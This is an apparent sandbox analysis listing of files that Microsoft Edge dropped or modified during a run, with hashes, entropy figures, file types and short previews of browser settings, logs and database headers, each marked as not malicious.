SSDEEP:
MD5:C8F6547869BEB57D06405BEF24F50685
SHA1:5CE9B05CAB555EE61F921D018906A2DF4FE1D888
SHA-256:40ED7AE8CFB6D4CDCCFD5C9F6E36E94609678E465E3104C0545E1100A09CA4E7
SHA-512:AED881D7133E4FEF26F070F55D64CB05FC5FCFD2CDAB9FFAC73AA67F7B81C796902ED707AA73245A097D727B053B6352D80E990319FBA26313973D6D60805FC1
Malicious:false
Reputation:unknown
Preview:...@..@...@.....C.].....@...................0...............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....q.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".vgssuk20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............2......................w..U.>.........."....."...2...".*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....+....W@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z............<..8...#...msNurturingAssistanceHomeDependency.....triggered...

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):280
Entropy (8bit):4.167052382566177
Encrypted:false
SSDEEP:
MD5:EA54130886D26B7F753BDF0BEA3723FA
SHA1:BD945139AEAD1F48BD3F4B96B03A6D0D3CC1C22F
SHA-256:9FECA4C595D70BC021ACE1BED898B63E45D3EFB5BE2E343F22E03C1AEE130DDB
SHA-512:0D1AA89027A368E5D4D8D3DDDC235FB15E0D4F723DB69655A7901E65AEFA03DE8FACF6689FB8B885905BE37DB79219E965EF109721D0B9210BA58034951CA2CB
Malicious:false
Reputation:unknown
Preview:sdPC......................z....K..s...x."C2Nft4srAayuXDT/+xJZdTAbGw727eySWzABz920p6g="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................7dc5f755-0f90-4102-bc8e-37d02917bdc7............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\10a26975-efb5-4936-9b0d-3d0a6353b4c8.tmp

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:modified
Size (bytes):39660
Entropy (8bit):5.562616770177027
Encrypted:false
SSDEEP:
MD5:1D6D7E069A6E6E8F118F3667A24EA9C7
SHA1:98E0BAD298DA0B046DAE139D8C256E948B58F70A
SHA-256:44892F81794AD421515342C5CCD03FAE70A8BB7628F6E4C53C404D7CFF0E2564
SHA-512:AB57BF84724027B1B406C0B6528CE6C911595BE612115A2F7061C862D461C013441F67EC9BBA0AEAA8F12F97D199E55AFFB48E13CF7A6EC424EF7495B55C7081
Malicious:false
Reputation:unknown
Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13363854767654649","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13363854767654649","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\9df2c178-fa4a-424b-a4f3-42f972d29cef.tmp

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):37816
Entropy (8bit):5.556226904927595
Encrypted:false
SSDEEP:
MD5:BAFEE66EAEDFBD1CE97813D2AECB9502
SHA1:84F1B9BF5206D1BB2E6B82DBA700AC1FAC7289BE
SHA-256:6AE3AB1C6E730A5539AD828C78316EFD42551CD4E2699F0DD22A567CDC2270CB
SHA-512:4BF869B6C327776FA128CA867F1B3AEB858EE87873CB0E7966B704143EB2504530D5189CC246CE37ABD9783402EEEC2E92A2392A2754C743192EF2F84555C0FF
Malicious:false
Reputation:unknown
Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13363854767654649","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13363854767654649","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:modified
Size (bytes):2163821
Entropy (8bit):5.222861262712058
Encrypted:false
SSDEEP:
MD5:6746185C93DFAC6A717C76CD8FAAC2E6
SHA1:83F4B2EB2F522B0E3CF4D6E043ED34D5E4DF7EB9
SHA-256:3305C23341D0BED6159BD9AD47C2F8694FDF2D7B5FEE0C3C361CE7F3D2CC5F63
SHA-512:1CFF25ABE9778012BBA18528A23BDCFE6DF54282FF2B60381F82F455D8D3B2B1B83D7E33487190CDC051ADB73F1FDC7B9E4C4F0A7C7F97907370F4F6591F1BCD
Malicious:false
Reputation:unknown
Preview:...m.................DB_VERSION.1...8.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13341056840624329.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):332
Entropy (8bit):5.1129388818369605
Encrypted:false
SSDEEP:
MD5:A271A202845BEF93EA8D3E05C338F32B
SHA1:498B332ED84BC8B037AFCE6F9E9CC27502201522
SHA-256:144B06F7CC83BDC0544F7547FC97FA50337AE73742A9039CA2D04015EA62F8B0
SHA-512:749FDE22FE960FA3FE01609CF1BAA85AD1175B008E1A1A10E5FAC723817C198759DE7D5507C2F81C00B77A22D677285B0D8BA89B260FC25E0EF96F6EB029AEF5
Malicious:false
Reputation:unknown
Preview:2024/06/26-01:52:50.315 123c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/06/26-01:52:50.317 123c Recovering log #3.2024/06/26-01:52:50.462 123c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):28672
Entropy (8bit):0.46238508969523423
Encrypted:false
SSDEEP:
MD5:8C4231051A19D1A207C7561F4D927030
SHA1:D4AB5E2646A7FBB212491D1016ACA00A7A3F39FD
SHA-256:F049FC647BEDA14BAE3B3A58850A2EA7842175CEB0E8C9461F6A37B529FBB7BF
SHA-512:82C4144963854373573F68E2466CCA14D4E6547BD979F9804FFD3324A8EB71BED05F8FF6F7D071A6EB3478F60EF239CCBFDF43A7AAC004158155FE6CC5B8E1CD
Malicious:false
Reputation:unknown
Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
Category:dropped
Size (bytes):10240
Entropy (8bit):0.8708334089814068
Encrypted:false
SSDEEP:
MD5:92F9F7F28AB4823C874D79EDF2F582DE
SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
Malicious:false
Reputation:unknown
Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):341
Entropy (8bit):5.244722198657495
Encrypted:false
SSDEEP:
MD5:1BF4A7835CE0AA49B79D90CCDC81F205
SHA1:443C600A2CF62E099AD675F841E8C1000631222A
SHA-256:21D1F69B0B7A65E972CA3D0A5E54909F6F92FE4C043F183164E09B111DE41A3C
SHA-512:45126AA0E53988343F9B10B25769745D8C433ACFA2A54CCBACC055B498ED777D049753D1A2E02219AFFC8FD9E33F9EB7C80EA85DA21500434E9C28E010CBC3CE
Malicious:false
Reputation:unknown
Preview:2024/06/26-01:52:47.656 95c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/06/26-01:52:47.658 95c Recovering log #3.2024/06/26-01:52:47.659 95c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
Category:dropped
Size (bytes):20480
Entropy (8bit):0.6144366280619991
Encrypted:false
SSDEEP:
MD5:D2F313C6E7E0C3231CC88F1FF3AA0B52
SHA1:F347263D1A1F686D14B3DA11CC5A34BEA73D0CAD
SHA-256:4F2C8D347D486EEC3E4FF4C06720ACBD240E994A0D499060F66421BC25B899D1
SHA-512:D0CCDB6A31AC010C6B0EC69A6EE5B190E28C06E5AFE80B49FF457FF46AA14AC0DF1ED896F00B88CF5F014DA56AE3495B81B982F505197CC01070904A7B7D5C69
Malicious:false
Reputation:unknown
Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:modified
Size (bytes):392512
Entropy (8bit):5.408421476803215
Encrypted:false
SSDEEP:
MD5:49ACE04EA3726EE76FACBD063A021A3F
SHA1:A500599ED1C231AE5424557ACDCA25B07BA825BF
SHA-256:02589A77EDC103C067F4CB8A978FD0B9916F3E683DDBB605144ABA6CE0D727F5
SHA-512:DC611DF013729081F59338511DDA080076E8F6C42E80B2898E76DBA6C24CFFFEC4A771D12B160350DA67B919DB9B604EDFDF0ABA9219B89317D6465928E174D3
Malicious:false
Reputation:unknown
Preview:...m.................DB_VERSION.1....q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13363854771134721..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.75/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":75},"hash":"EwG2gkfquexLj6u3yjHyiL4YQwdU318k1Hub+1rSDMI=","size":391864}]Q"j%`~...............ASSET_VERSION:domains_config_gz.2.8.75..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):307
Entropy (8bit):5.144933543625523
Encrypted:false
SSDEEP:
MD5:5DBAF19618F8EFE10B8D36AB7E33DB7F
SHA1:F59945E2402D5C7810720E7BBE90EC7BD95F2A3B
SHA-256:791AACA62854E53DD02B04E9D2AB1FA962DA288F477814C8E4D5F225CBAE3C54
SHA-512:69C544CE222F8E73823B92D26A3CDFDA8FD248D658645D58C5628C371368D8A3B67ADD8D0E9C5FA53AEF6C52DB3A83CC622D6448EEE13AAF684867645BC27DDA
Malicious:false
Reputation:unknown
Preview:2024/06/26-01:52:50.331 1004 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/06/26-01:52:50.436 1004 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:modified
Size (bytes):374811
Entropy (8bit):5.3961728977238135
Encrypted:false
SSDEEP:
MD5:C2471184D95C41ECA37D2CFBF1831629
SHA1:16C2A9F26D7D4A47D7AC1CD088A2867F4B62136F
SHA-256:21B0A31D2E299A8DC553DE08B5AAE7F909EA032CAB4327664B21E596B888A876
SHA-512:C07A7685DEDE441114CC2D27C71470654D2ABE5B37932900B5CC1D50046A8DEAD3685291DE780B69290B9E733758008DBD7D0C4F37372C0E48EF6798B244D330
Malicious:false
Reputation:unknown
Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):418
Entropy (8bit):1.8784775129881184
Encrypted:false
SSDEEP:
MD5:BF097D724FDF1FCA9CF3532E86B54696
SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
Malicious:false
Reputation:unknown
Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):317
Entropy (8bit):5.191305546776709
Encrypted:false
SSDEEP:
MD5:45FB19E4FD228DD9DC7B4D87B2A402CA
SHA1:6F2A52149CF517A9DEA182C3310325BC4EC5AB10
SHA-256:517207B0C45C37A7CE7F39DBBF1F34B2F6A8661122B96601D3454C52CFE9A3AA
SHA-512:BE6A7510A9EE3C6E83C1BF1C5C3F7C03C7399C6F9055A4C9993A29CB570B08414FCC306905ECA97230DA5F0BFA91F89621FB55A992665A9CF5051369B88BA06A
Malicious:false
Reputation:unknown
Preview:2024/06/26-01:52:47.659 9dc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/06/26-01:52:47.660 9dc Recovering log #3.2024/06/26-01:52:47.660 9dc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):321
Entropy (8bit):5.2311889898049575
Encrypted:false
SSDEEP:
MD5:20280F4B810BF0DF4342C04DF6D21B78
SHA1:3911A8804031D91A2EA867FB4F0074015E009B09
SHA-256:3D30720E4BF964246422D262E1873F27B7429FF1756B3076EBA422F5E5405364
SHA-512:FC8F59D6A431674566230BF584292FD3C5E32707A9D6DC3DDE2B07853722B380D4E11BA018E007AE1186A476DAA23460C9FA6B9F4EF1FADD88E6A849DC0A7D4E
Malicious:false
Reputation:unknown
Preview:2024/06/26-01:52:47.677 9dc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/06/26-01:52:47.681 9dc Recovering log #3.2024/06/26-01:52:47.681 9dc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):1254
Entropy (8bit):1.8784775129881184
Encrypted:false
SSDEEP:
MD5:826B4C0003ABB7604485322423C5212A
SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
Malicious:false
Reputation:unknown
Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):320
Entropy (8bit):5.146858745629074
Encrypted:false
SSDEEP:
MD5:60EDE8FB2770671060190D50AFA607B2
SHA1:152DC4CF440C688420CB907DD0CA4E2F227B95AE
SHA-256:65DCDDA028DCF282D0985B8FA90F3B7654FF9CC0FF34024954C8A246AC5222FE
SHA-512:F9CEE12079267A36985F056CD1724F524F1041A4A6EA6FF88F80A56A6D49D43D6D2284CE2F8B32931FD2D6916CB5D87B1924889615D36F50F6CDB69ACF0F6B74
Malicious:false
Reputation:unknown
Preview:2024/06/26-01:52:48.295 1ee0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/06/26-01:52:48.296 1ee0 Recovering log #3.2024/06/26-01:52:48.296 1ee0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):429
Entropy (8bit):5.809210454117189
Encrypted:false
SSDEEP:
MD5:5D1D9020CCEFD76CA661902E0C229087
SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
Malicious:false
Reputation:unknown
Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:modified
Size (bytes):8720
Entropy (8bit):0.21782872433447142
Encrypted:false
SSDEEP:
MD5:B070A3CF3690469D1F4058DDA657B37A
SHA1:FBFDE4B97C5C051853882B435AACEE1E4020EFF8
SHA-256:487BE7F3FE1654751355ADB3B7331C4670EECE17CD342BCCF37DD86696C43C05
SHA-512:8F8AF12C59041317839859F2A9E09EEB44737AB9D1C448359293CF183CE4DD4035B53D09BD3E6AD917CFE45FB87E77A9D2A28AC26BA823152B985027794580F9
Malicious:false
Reputation:unknown
Preview:............r)b....&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text, with very long lines (1597), with CRLF line terminators
Category:dropped
Size (bytes):0
Entropy (8bit):0.0
Encrypted:false
SSDEEP:
MD5:3D8183370B5E2A9D11D43EBEF474B305
SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:false
Reputation:unknown
Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 11, cookie 0x3, schema 4, UTF-8, version-valid-for 6
Category:dropped
Size (bytes):45056
Entropy (8bit):3.5486605025222593
Encrypted:false
SSDEEP:
MD5:5EBE9EAFAE4E97D88F7C44AA4D3829B5
SHA1:D73096597D0F62D501B88AB04354F33705E0B122
SHA-256:ACB4AD9C395FEEBB027C8B7087F2EA8976F63D4FC80E71DAC2DCC7E0C5E51FD6
SHA-512:F7CCE45FB655FEC84B45F0BFC95B6908FF9398C6D94329FE1AA2FD6FCA19CA0217A774B321339779E8F374AC11A128CA1798AFCDC8490EE23591ED884AD1CC96
Malicious:false
Reputation:unknown
Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):401
Entropy (8bit):5.250308283486264
Encrypted:false
SSDEEP:
MD5:E7D8D94B9F962B0D219A0D0F29645769
SHA1:133A980F62F5AA35C82E9438FCF7199BA3CB40BA
SHA-256:47118ADBDE02355E831274BBF645712CB0AD377C84C4A07F1DDDEC2470690344
SHA-512:EB952376D156CA5ECDB07CE18622EAF3803A2B5E042FA5C0E6FEADF90BD2661E2EE49DA5216A26C5F29786D7E5A92E8C8C8092360F973B1396828C9089192FB1
Malicious:false
Reputation:unknown
Preview:2024/06/26-01:52:49.043 6f0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/06/26-01:52:49.043 6f0 Recovering log #3.2024/06/26-01:52:49.044 6f0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):1608
Entropy (8bit):5.717982498109295
Encrypted:false
SSDEEP:
MD5:74E3CE2F456FE2AF4F66051281F71414
